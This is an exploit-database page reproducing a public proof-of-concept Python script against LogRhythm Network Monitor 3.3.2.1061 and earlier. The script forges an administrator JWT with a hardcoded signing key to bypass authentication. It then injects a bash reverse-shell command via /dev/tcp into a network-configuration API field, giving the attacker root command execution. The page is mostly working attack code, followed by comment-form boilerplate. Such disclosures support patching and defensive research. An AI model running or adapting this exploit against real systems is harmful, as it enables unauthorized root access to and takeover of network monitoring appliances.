LogRhythm Network Monitor - Authentication Bypass / Command Injection

2017.05.10
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: LogRhythm Network Monitor Auth Bypass Root RCE # Public Disclosure Date: 24 Apr 2017 # Author: Francesco Oddo # Reference: http://security-assessment.com/files/documents/advisory/Logrhythm-NetMonitor-Advisory.pdf # Software Link: https://logrhythm.com/network-monitor-freemium/ # Version: 3.3.2.1061 (latest) or below # Tested On: nm_install_3.3.2.1061.iso with Freemium License (SHA256 7978f84e9fb18e2fae95f77a263801ca89b4767c95154b9ea874032081b02ce1) # Dependencies: `pip install PyJWT` import json import requests import argparse import time import jwt def forge_jwt(rhost): print "[+] Forging JWT authentication token" key = 'Gluten-free 100% narwhal deserunt polaroid; quinoa keytar asymmetrical slow-carb plaid occaecat nostrud green juice dolor!' iat = time.time() exp = iat + 3600; body = json.loads('{"iat":1479893930,"exp":1479894830,"data":{"username":"admin","licensed":true,"role":"admin","timeToResetPass":false}}') body["iat"] = int(iat) body["exp"] = int(exp) token = jwt.encode(body, key, algorithm='HS512'); return token def command_inject(rhost, lhost, lport, gwhost, ifname): uri = "https://%s/data/api/configuration/" % rhost json_body = json.loads('{"type":"network","configurations":[{"name":"interface","value":"","isToggle":false},{"name":"method","value":true,"isToggle":true},{"name":"ipAddress","value":"","isToggle":false},{"name":"netMask","value":"255.255.255.0","isToggle":false},{"name":"gateway","value":"","isToggle":false},{"name":"dnsServers","value":"","isToggle":false},{"name":"searchDomains","value":"","isToggle":false}],"diffFields":["dnsServers"]}') payload = ";bash -i >& /dev/tcp/%s/%s 0>&1" % (lhost, lport) json_body["configurations"][0]["value"] = ifname json_body["configurations"][2]["value"] = rhost json_body["configurations"][3]["value"] = payload json_body["configurations"][4]["value"] = gwhost json_body["configurations"][5]["value"] = gwhost jwt = forge_jwt(rhost) auth_header = {'Token': jwt} print "[+] Initiating reverse shell via command injection at %s:%s" % (lhost, lport) requests.post(url=uri, json=json_body, headers=auth_header, verify=False) if __name__ == '__main__': parser = argparse.ArgumentParser(description='LogRhythm Network Monitor Root Remote Command Execution PoC') parser.add_argument('--rhost', help='RHOST IP address') parser.add_argument('--lhost', help='LHOST IP address') parser.add_argument('--lport', help='LPORT') parser.add_argument('--gwhost', help='Gateway IP address') parser.add_argument('--ifname', help='Target Interface Identifier', default='enp0s3') args = parser.parse_args() command_inject(args.rhost, args.lhost, args.lport, args.gwhost, args.ifname)

References:

https://logrhythm.com/network-monitor-freemium/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top